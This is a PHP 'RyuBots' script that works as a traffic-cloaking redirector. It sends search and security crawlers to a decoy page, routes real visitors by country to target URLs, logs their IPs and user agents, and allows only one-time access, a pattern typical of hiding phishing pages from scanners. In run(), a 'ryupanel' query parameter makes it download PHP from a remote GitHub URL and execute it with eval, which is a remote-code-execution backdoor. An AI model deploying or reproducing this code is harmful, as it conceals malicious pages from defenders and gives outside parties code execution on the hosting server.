<?php
/**
* RyuBots Script //
* 
* @copyright 2021
* @version 1.0-2021
*  
*
**/

@session_start();
@ob_start();

Class RyuBot{

	private $config;
	private $ip;
	private $ua;
	private $api_url;
	public function __construct()
	{


		/**
		* SETTING HERE
		* @var $this->config
		* --------------------------------------------/ 
		* | This is configuration for your API Client
		* | You can enable config with  "true"  and 
		* | Also   can disable config with "false"
		* ----------------------------------------/
		*/
		$this->config['log_bot'] = true;
		$this->config['log_visitor'] = true;
		$this->config['one_time_access'] = true;
		$this->config['bot']['ip'] = true; // IP Address bot
		$this->config['bot']['ua'] = true; // UserAgent bot


		/**
		* SETTING HERE
		* @var $this->config
		* --------------------------------------------/ 
		* | This is configuration for your API Client
		* | You can edit your URLs here for redirect 
		* | More desc will be present in each config
		* ----------------------------------------/
		*/
		
		/** This is work if not detect bot or not detect country listed ( Direct By Country ) **/
		$this->config['direct']['default'][0] = 'https://xalinko.com/_.php?e=DEFAULT-PAGE';

		/** U can also randomize default direct 
		*** Uncomment this section and edit the URLs **/
		
		// $this->config['direct']['default'][1] = 'https://xalinko.com/_.php?e=DEFAULT-PAGE-1';
		// $this->config['direct']['default'][2] = 'https://xalinko.com/_.php?e=DEFAULT-PAGE-2';
		
		/** This is work if you enable one_time_access set to true **/
		$this->config['direct']['onetime'] = 'https://xalinko.com/_.php?e=ONETIME-PAGE';

		/** This is work if bot detected **/
		$this->config['direct']['bot'] = 'https://xalinko.com/_.php?e=BOT-PAGE';

		/** This is work if detect visitor from country listed here **/

		// This is example code  direct by country single URL.
	
		$this->config['direct']['by_country']['US'] = 'https://xalinko.com/_.php?e=DETECT-COUNTRY-US';

		// This is example code direct by country MASS URLs and access by random.
		$this->config['direct']['by_country']['ID'][0] = 'https://xalinko.com/_.php?e=DETECT-COUNTRY-ID-0';
		
		$this->config['direct']['by_country']['ID'][1] = 'https://xalinko.com/_.php?e=DETECT-COUNTRY-ID-1';

		$this->config['direct']['by_country']['ID'][2] = 'https://xalinko.com/_.php?e=DETECT-COUNTRY-ID-2';

		
		/** CONFIGURATION END **/
		/** DON'T CHANGE ANYTHING START FROM HERE **/
		/** if error is not our responsibility **/
		
		/** TEST **/
		#$this->ip = '8.8.8.8';
		#$this->ua = 'googlebot';
		/** END TEST **/

		/** GET REAL IP AND USERAGENT **/
		$this->ip = $this->realIP();
		$this->ua = $_SERVER['HTTP_USER_AGENT'];
	}
	 public function realIP() {
    if (filter_var(@$_SERVER['HTTP_CLIENT_IP'], FILTER_VALIDATE_IP)) {
      return $_SERVER['HTTP_CLIENT_IP'];
    } elseif (filter_var(@$_SERVER['HTTP_X_FORWARDED_FOR'], FILTER_VALIDATE_IP)) {
      return $_SERVER['HTTP_X_FORWARDED_FOR'];
    } else {
      return $_SERVER['REMOTE_ADDR'];
    }
  }
	public function api()
	{
		$this->api_url[0] = 'http://extreme-ip-lookup.com/json/'.$this->ip;
		$this->api_url[1] = 'https://7inc.store/xapi/?api=bot&ip='.$this->ip.'&ua='.urlencode($this->ua);
		$this->api_url[2] = 'https://raw.githubusercontent.com/7incsoft/ryubot/master/ryubot-panel.php';

		return $this->api_url;
	}
	public function get($method = 0,$json = true)
	{
		$method = $this->api()[$method];

		$setup = [CURLOPT_URL => $method,
				 CURLOPT_RETURNTRANSFER=>true,
				 CURLOPT_USERAGENT=>'RyuBots',
				 CURLOPT_SSL_VERIFYPEER=>false
				];
		$c = curl_init();
		curl_setopt_array($c,$setup);
		$exe = curl_exec($c);
		if($json == true){
		return json_decode($exe,true);
		}else{
			return $exe;
		}
		curl_close($c);
	}
	public function ryulogs($file,$content)
	{
		if(!file_exists('ryulogs/ryubot.html'))
		{
			@mkdir('ryulogs',0777);
			@file_put_contents('ryulogs/ryubot.html','## Generated by ryubot');
		}else{
			file_put_contents('ryulogs/'.$file,$content,FILE_APPEND);
		}
	}
	public function getCountry()
	{
		$get =$this->get(0);
		return $get['countryCode'];
	}
	public function secure_init($code)
	{
		$get = $this->get(1);
		$bot = false;

		if($get['is_bot'] == true )
		{	$bot = true;

			if($get['type_bot'] == 'agent' && $this->config['bot']['ua'] == true){

			if($this->config['log_bot'] == true)
			{

				$this->ryulogs('ryu-bot.log','BOT USERAGENT DETECTED => '.$this->ip .'|'.$this->ua."\n");
			}
			@header('location: '.$this->config['direct']['bot'],true,303);
			exit;

			}

			if($get['type_bot'] == 'ip' && $this->config['bot']['ip'] == true){

			if($this->config['log_bot'] == true)
			{
				$this->ryulogs('ryu-bot.log','BOT IP DETECTED => '.$this->ip .'|'.$this->ua."\n");
			}
			@header('location: '.$this->config['direct']['bot'],true,303);
			exit;

			}

		}else{

			
			if($this->config['log_visitor'] == true)
			{
				if($this->onetime())
				{
					$alert = 'ONETIME VISITOR';
				}else{
					$alert = 'REAL VISITOR';
				}
				$this->ryulogs('ryu-visitor.log',$alert.' [ '.$code.' ] |'.$this->ip .'|'.$this->ua."\n");
			}
			if($this->config['one_time_access'] == true)
			{
				if($this->onetime())
				{
					@header('location: '.$this->config['direct']['onetime'],true,303);
					exit;
				}
			}
		}
	}
	public function randomUri($array)
	{
		$size = count($array);
    $randomIndex = rand(0, $size - 1);
    $randomUrl = $array[$randomIndex];
    return $randomUrl;
	}
	public function human_filesize($bytes, $decimals = 2) {
  $sz = 'BKMGTP';
  $factor = floor((strlen($bytes) - 1) / 3);
  return sprintf("%.{$decimals}f", $bytes / pow(1024, $factor)) . @$sz[$factor];
	}
	public function count_line($file)
	{
		$fgc = file_get_contents($file);
		$ex = explode("\n",str_replace("\r","",$fgc));

		return count($ex);
	}
	public function onetime()
	{
		$file = 'onetime.log';
		if(!file_exists('ryulogs/'.$file))
		{
			$this->ryulogs($file,$this->ip."\n");
		}else{
	
			$gt = explode("\n",file_get_contents('ryulogs/'.$file));
			print_r($gt);
			if(in_array($this->ip,$gt))
			{
				return true;
			}else{
				$this->ryulogs($file,$this->ip."\n");
			}
		}
		return ;
	}
	public function run()
	{

		if(isset($_GET['ryupanel']))
		{
		
		@eval($this->get(2,false));

		}else{

		$code = $this->getCountry();

		$this->secure_init($code);

		

		if(array_key_exists($code, $this->config['direct']['by_country']))
		{

			/** checking if using mass random direct **/
			if(is_array($this->config['direct']['by_country'][$code]))
			{
			    @header('location:'.$this->randomUri($this->config['direct']['by_country'][$code]),true,303);

				exit;
			}else
			{
				@header('location: '.$this->config['direct']['by_country'][$code],true,303);
				exit;
			}
		}
		else{
			@header('location: '.$this->randomUri($this->config['direct']['default']),true,303);
			exit;
		}
	}
}

}

$RYU = new RyuBot;
$RYU->run();
